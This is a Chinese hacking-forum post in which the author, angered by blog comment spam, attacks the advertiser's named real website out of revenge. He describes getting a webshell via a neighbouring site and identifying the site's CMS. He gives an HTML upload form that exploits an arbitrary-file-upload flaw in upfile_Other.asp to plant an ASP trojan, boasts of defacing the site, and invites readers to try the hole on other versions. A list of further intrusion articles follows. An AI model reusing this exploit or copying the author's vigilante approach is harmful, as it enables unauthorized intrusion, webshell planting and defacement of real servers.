[推荐]黑一广告站时发现的漏洞一大早的来到公司打开自己的BLOG..却发现BLOG评论里N多垃圾广告...
具体内容是什么
内江云吉滤烟技术研究所
然后还发出了网站地址
http://www.2266556.com/
当时看到了气不打一处来...好不容易算是制止住了一些广告..这个SB又发了那么多
害我删了半天..不教训教训他这口气怎么咽的下..
首先旁注拿到一webshell发现没权限..直接从这个站入手..发现他程序的版权给改掉了..看了N多页面后..在一个登陆页面看了源代码时发现一个隐藏的"紫荆科技"
去baidu搜索后才知道这个程序是
紫荆科技企业网站管理系统
然后就下载了一个
紫荆科技企业网站管理系统V9.0(无功能限制完美版)
来看他的代码试图找到突破点
经过不断的测试发现
http://www.2266556.com/upfile_Other.asp
可以上传任意文件
使用以下的代码就可以成功上传asp木马...
| 以下是引用片段: <FORM name=form1 action="http://www.2266556.com/upfile_Othe ... sp;method=post encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> <INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML> |
SB站的黑页截图
目标站用的程序版本不知道是多少..别的版本我也未测试
有兴趣的可以测试是否也存在此漏洞
| dxbbs漏洞(通杀7.3以前所有版本) | 04-06 | |
| 记对一足球推荐站点的渗透 | 04-06 | |
| 注射DB_ONER权限并且主机与数据库 | 04-06 | |
| bbsxp sql最新版再爆0day? | 04-02 | |
| BBS的通杀跨站方法 | 04-02 | |
| CCTV的XSS跨站 | 03-28 | |
| 全面解析百度XSS跨站漏洞 | 03-26 | |
| Wordpress 2.1.2 以及之前版本物 | 03-26 | |
| 动易最新入侵方法 | 03-15 | |
| PJBlog漏洞利用 | 03-14 | |
| DVBBS <= 7.1.0 sp1 博客 远程注 | 03-14 | |
| php简单入侵 | 02-07 | |
您现在的位置: